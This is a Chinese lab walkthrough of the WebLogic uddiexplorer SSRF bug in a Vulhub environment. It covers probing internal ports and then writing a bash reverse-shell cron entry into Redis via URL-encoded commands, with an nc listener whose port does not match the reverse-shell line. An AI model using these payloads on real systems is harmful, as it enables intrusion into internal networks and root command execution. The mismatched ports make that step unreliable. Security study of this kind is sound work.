本文详细介绍了WebLogic服务器的SSRF漏洞,包括漏洞成因、受影响版本、利用步骤和端口探测。通过该漏洞,攻击者可以探测内网服务,如Redis,并可能实现反弹shell。提到了利用环境Vulhub,以及如何通过HTTP请求探测端口状态和利用CRONTAB进行反弹shell。同时,还列举了内网端口存在与不存在时的响应情况以及反弹shell的命令构造方法。
漏洞介绍
漏洞描述
Weblogic的http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp中由于服务器端没有对用户请求做出严格的过滤及限制,导致其可以从其他服务器获取一定的信息存在SSRF漏洞,利用该漏洞可以发送任意的HTTP请求,进而探测内网的redis,fastcgi等脆弱组件
影响版本
10.0.2.0 10.3.6.0
漏洞利用
环境:vulhub(ip:192.168.188.130)
1.开启该环境后访问http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
2.利用F12,查看IBM(存在ssrf的重要点)
发现这里存在传入url,存在SSRF,根据返回情况的不同,可以探测内网端口的开放状态,进而利用服务
3.用burp抓包
这里可以进行端口探测,可以输入任意http协议
内网端口探测
这里尝试得到以下几种情况:
一.尝试:192.168.188.130
返回不存在此协议
二.尝试:https://192.168.188.130
三.尝试:http://192.168.188.130
端口存在时显示404
四.尝试:http://192.168.188.130:7000
端口不存在时显示
五.尝试:http://172.22.0.2:6379
表示该ip开启redis
这里大家一定会问172.22.0.2怎么这么容易找到的,真实环境可以使用python脚本去爆,我这里直接输入命令:
docker ps (看docker开启的进程,去寻找配套的redis)
然后查找该redis进程的ip,命令如下:
docker exec -it d48d2f930ccd ip addr
总结:
端口存在返回状态码: returned a 404 error code
端口不存在 : but could not connect over HTTP to server
非http协议: did not have a valid SOAP content-type
协议没写: no protocol
反弹shell
这里将反弹shell的脚本写入/etc/crontab
命令如下:
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
Save
aaa
这里需要对其进行url编码,因为redis是通过换行符来分隔每条命令的,换行符“\r\n”也就是“%0D%0A”
将上面的命令url编码放在ssrf的域名后面即可,点击发送
在攻击机中开启监听
命令:nc -lvp 4444
等待一分钟即可反弹shell
可以看到反弹shell写进了crontab中
补充
可进行利用的cron的地方
1./etc/crontab 这个监听新的端口时会产生覆盖
2./etc/cron.d/* 将任意文件写入该目录下,效果格式和crontab一样,漏洞利用这个目录,可以不覆盖其他文件情况下进行反弹shell
3./var/spool/cron/root centos系统下root用户的cron文件
4./var/spool/cron/crontabs/root debian系统下root用户的cron文件
扫一扫
661
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
